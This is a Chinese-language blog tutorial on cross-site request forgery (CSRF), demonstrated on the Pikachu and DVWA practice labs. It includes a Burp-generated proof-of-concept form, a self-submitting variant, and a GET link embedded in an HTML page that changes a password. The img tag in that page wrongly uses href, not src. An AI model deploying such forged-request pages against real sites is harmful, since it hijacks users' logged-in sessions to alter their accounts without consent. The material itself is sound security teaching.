CSRF基础

已于 2023-02-27 19:44:12 修改
阅读量176 收藏
点赞数
分类专栏: OWASPTOP漏洞 文章标签: csrf servlet 前端
于 2023-02-26 12:31:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/blackguest07/article/details/129225417
版权

作者:凌度

仅供学习,切勿用于非法途径

1. 定义:

是基于回话实现的攻击攻击者需要在被攻击着与目标 Web 保持会话的时候,然后给它一个 url 链接,如果对方这时会话是保持着的,那么这个攻击就会实现

它是一种挟持用户在当前已登录的 Web 应用程序上执行非本意的操作的攻击方法

2. csrf 利用:

1. 请求是伪造的:

攻击流程:当被攻击者登录某一网站的时候,在此期间,由于攻击者向你发送了一个构造好的

csrf 脚本或包含 csrf 脚本的链接,可能会执行一些用户不想做的功能(比如添加账号等)而这个操作并不是用户真正想要执行的

1. post 请求:

post 请求构造 payload 稍微有点难度,但是我们可以借助 burp 去生成 payload

拦截之后,即可在面板右键生成 CSRF 漏洞利用代码

注意:用户名为 kobe 是攻击者的用户名

生成 CSRF 攻击代码之后,然后把这个源码放在 html 里面,当被攻击者在那个页面的时候,然后你就可以双击这个 html 文件

burp 相当于是生成了一个当目标点击该链接就会自动提交 post 表单的 html 页面

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>
      history.pushState('', '', '/')
    </script>
    <form action="http://pikachu/vul/csrf/csrfpost/csrf_post_edit.php" method="POST">
      <input type="hidden" name="sex" value="boy" />
      <input type="hidden" name="phonenum" value="15988767673" />
      <input type="hidden" name="add" value="123aa34" />
      <input type="hidden" name="email" value="kobe&#64;pikachu&#46;com" />
      <input type="hidden" name="submit" value="submit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

从而实现数据的修改,但是我们还需要注意的一个点就是,我们被攻击者使用的浏览器和我们点击 CSRF 的 html 文件的浏览器一定要一致,否则就无法造成数据的修改

当然我们这里是存在一个缺陷的,就是用户点击该链接之后需要手动去点 Submit request 才能实现 csrf 攻击,我们应该对该 html 进行修改,就是加载页面的时候,让它自动提交表单

1. 改进后的 html:

我们直接利用 js 去提交表单,然后提交后的表单进行跳转即可

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
    <script>
        history.pushState('', '', '/')
    </script>
    <form action="http://pikachu/vul/csrf/csrfpost/csrf_post_edit.php" method="POST">
        <input type="hidden" name="sex" value="boy" />
        <input type="hidden" name="phonenum" value="15988767673" />
        <input type="hidden" name="add" value="123aa34" />
        <input type="hidden" name="email" value="kobe&#64;pikachu&#46;com" />
        <input type="hidden" name="submit" value="submit" />
        <input type="submit" value="Submit request" />
    </form>
    # 自动提交表单
    <script>
        document.forms[0].submit()
    </script>
</body>
</html>

2. get 请求:

get 请求非常简单,只需要一个 url 请求即可

我这里以 dvwa 作为案例,用户名:admin 密码 password

我们来到 dvwa 靶场,我们更改密码 123123 ,然后用 burp 进行拦截,

http://dvwa//vulnerabilities/csrf/?password_new=123123&password_conf=123123&Change=Change

接下来只需要做的就是让对方点击该链接之后,即可实现 CSRF 的攻击,我们可以通过在一个 html 页面中去放一个 img 标签,然后在标签里面放入该链接即可

<html lang="en">
​
  <head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
  </head>
​
  <body>
    <img href="http://dvwa//vulnerabilities/csrf/?password_new=123.com&password_conf=123.com&Change=Change" alt="">
​
  </body>
​
</html>

只要用户点击该链接就会触发 csrf

3. CSRF 漏洞发现:

1. 关注数据包中关键字:

数据包中几个关键字段,是否根据 cookie 来判断请求包

检查:Referer,auto,csrftoken 字段

2. 快速判断 CSRF 漏洞是否存在:

当你找到这些关键字之后,在请求信息中你把它删了,然后发送看相应数据,如果请求还是能够正常执行,那么就说明存在 csrf 漏洞

ldsecurity
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CSRF基础原理(Cross-site request forgery)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
02-15 1533
CSRF基础原理(Cross-site request forgery) 文章目录CSRF基础原理(Cross-site request forgery)什么是跨站请求伪造 (CSRF)?案例解释 什么是跨站请求伪造 (CSRF)? 在CSRF的攻击场景攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了 案例解释 粘贴于 pikachu… 小黑想要修改大白在购物网www.xx.com上填写的会员地址。 先看下大白是如何修改自己的密码的: 登录
基础漏洞csrf挖掘实战
10-07
当我们可以使目标对象浏览器发送HTTP请求到别的Web 网站时,就会发生跨站请求伪造(CSRF)攻击。该Web网站会执行一些操作,使得请求看起来是有效的,...简而言之csrf攻击就是利用了网站用于请求进行身份认证的进程的缺陷。
八、PHP框架Laravel学习笔记——表单伪造和 CSRF 保护
zep
05-07 332
一.表单伪造 之前一直用的 GET 请求方式,而表单可以实现 POST 方式,我们来实验下: 先在 TaskController 创建两个方法,一个表单页,一个接受表单数据路由; public function form() { return view('form'); } //表单页 Route::get('task/form', 'TaskController@form'); //接受表单数据 Route::any('task/getform', function () {
csrf从小白到入门(简单易懂,有逻辑)
五分之一世纪
04-15 5265
<1>简介 csrf(cross-site-request-forgery)俗称跨站请求伪造,这种漏洞是服务端对用户审核不严格导致的。简单来说就是伪造一个用户的身份做一些违法乱纪的事情。举例说明,假如有一个人叫A,A打开了一个网站,这个网站在A打开并且登录之后返回了一个cookie,如果我这时发了一个钓鱼邮件给A,邮件有我提前写好的html文件,A打开邮件附录的 html文件之后会直接访问他刚刚打开的网站,这时计算机会直接将刚刚的cookie发给服务器,这样就实现了冒用他的身份。有的人可能会问
ajax put请求_用HTTP请求重写实现JSON CSRF
weixin_39924307的博客
11-27 291
在该篇Writeup,介绍了作者在某漏洞测试项目发现JSON类型跨站请求伪造漏洞(Cross-Site Request Forgery,CSRF)的过程。通常来说,JSON CSRF漏洞主要在于Web应用本身的身份验证机制上,简单来看存在该漏洞,其HTTP请求须满足以下三个条件:1、Web应用身份验证机制是基于Cookie形式的(Cookie形式的验证机制本身存在CSRF攻击风险);...
CSRF漏洞详解
qq_61553520的博客
04-21 135
跨站请求攻击,简单地说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个用户曾经认证过的网站并执行一些操作(如发邮件,发消息,甚至财产转账和购买商品)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户操作而去运行。这利用了Web用户身份验证的一个漏洞:简单的身份验证只能保证请求发自某个用户的浏览器,却不能保证请求本身是用户自愿发出的。通俗的讲就是:如果网站过滤不严格,攻击者可以欺骗浏览器登录登录别的网站。正常用户登录了一个网站,网站A会返回一个cookie存储在用户A的浏览器上。
CSRF 详情讲解 !!!
weixin_52834606的博客
09-05 3070
CSRF 详解 ! spring security 攻击
Django之CSRF
qq_43687990的博客
09-20 203
1.csrf原理 csrf要求发送post,put或delete请求的时候,是先以get方式发送请求,服务端响应时会分配一个随机字符串给客户端,客户端第二次发送post,put或delete请求时携带上次分配的随机字符串到服务端进行校验 2.Djangocsrf使用 Djangocsrf间件作用于整个项目。Django内置了很多间件,其之一便有csrf间件: MIDDLEWARE ...
Csrf基础
RuanJian_GC的博客
05-24 636
Cross-Site Request Forgery,又称为跨站请求伪造。
CSRF基础学习
A1andNS's Blog
12-16 291
这是一篇关于CSRF的简单的了解学习博文。适合初步了解时阅读。
python 零基础学习篇python课程django框架21 CSRF的django使用 .mp4
04-21
python 零基础学习篇
nosurf:Go的CSRF保护间件
02-03
尽管CSRF是一个突出的漏洞,但Go的与Web相关的软件包基础结构主要由微框架组成,这些微框架既不实施CSRF检查,也不应该实施CSRF检查。 nosurf通过提供nosurf来解决此问题,该CSRFHandler包装了您的http.Handler并在...
python 零基础学习篇9 csrf的流程和短信验证避免发生的解决 .mp4
04-21
python 零基础学习篇
Web应用安全:CSRF进阶.pptx
06-18
1、CSRF基础攻击 一句话概括CSRF:攻击者盗用、伪造受害者的身份,用受害者的名义发送恶意请求,而这种恶意请求在服务端看起来是正常请求CSRF进阶 2、CSRF+XSS 跨站请求伪造(CSRF)和跨站脚本攻击(XSS)都是在...
csrf与xss差别 别在弄乱了 直接靶场实操pikachu的csrf题 token绕过可以吗???
helloKittywz的博客
06-09 1358
我们现在来说说这2个之间的关系,因为昨天的我也没有弄清楚这2者的关系,总感觉迷迷糊糊的。xss这个漏洞是大家并不怎么陌生,导致xss漏洞的产生是服务器没有对用户提交数据过滤不严格,导致浏览器把用户输入的当作js代码返回客户端进行执行,这样就导致了攻击。xss(跨站脚本攻击)可以说简单一点前端js代码可以干什么我们就可以干什么,我们可以获取到用户的cookie,获取键盘记录,钓鱼等等的操作我们来说说csrf这个漏洞csrf(跨站请求伪造)这个是利用用户的。
Pikachu上的CSRF以及NSSCTF上的[NISACTF 2022]bingdundun~、 [SWPUCTF 2022 新生赛]xff
最新发布
2401_82388450的博客
06-13 626
CSRF,跨站域请求伪造,通常攻击者会伪造一个场景(例如一条链接),来诱使用户点击,用户一旦点击,黑客的攻击目的也就达到了,他可以盗用你的身份,以你的名义发送恶意请求CSRF攻击的关键就是利用受害者的cookie向服务器发送伪造请求CSRF利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密码等)。
CSRF令牌解析:保护web应用免受攻击
weixin_74923758的博客
06-12 616
跨站请求伪造(CSRF)是一种广泛存在的网站攻击手段。与另一常见的攻击手段XSS(跨站脚本攻击)相比,CSRF并不试图窃取用户的数据,而是欺骗用户执行未授权的操作。这种攻击方式利用了Web应用用户会话的一个漏洞,让攻击者可以伪装成信任的用户来执行某些操作。考虑一下,如果你不小心点击了一个恶意链接,那么你可能会在不知情的情况下执行了一些不应该执行的操作,例如转账、更改密码等。在这个具体示例,我们通过生成、嵌入和验证CSRF令牌,确保了只有合法用户才能更改个人信息。
渗透测试,CSRF基础知识
07-23
以下是关于 CSRF基础知识: 1. CSRF 的原理:CSRF 攻击利用了网站对用户身份验证的信任,攻击者通过欺骗用户在目标网站上执行一个恶意请求,从而实现对用户账户的操作。 2. CSRF 的过程:攻击者构造一个包含...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ldsecurity

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值